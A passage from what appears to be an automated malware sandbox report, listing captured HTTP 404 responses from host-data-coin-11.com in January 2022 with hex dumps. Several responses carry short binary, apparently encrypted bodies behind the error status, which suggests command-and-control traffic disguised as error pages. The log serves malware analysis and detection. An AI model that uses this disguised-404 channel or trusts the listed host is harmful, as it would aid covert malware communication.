72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:13:57 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
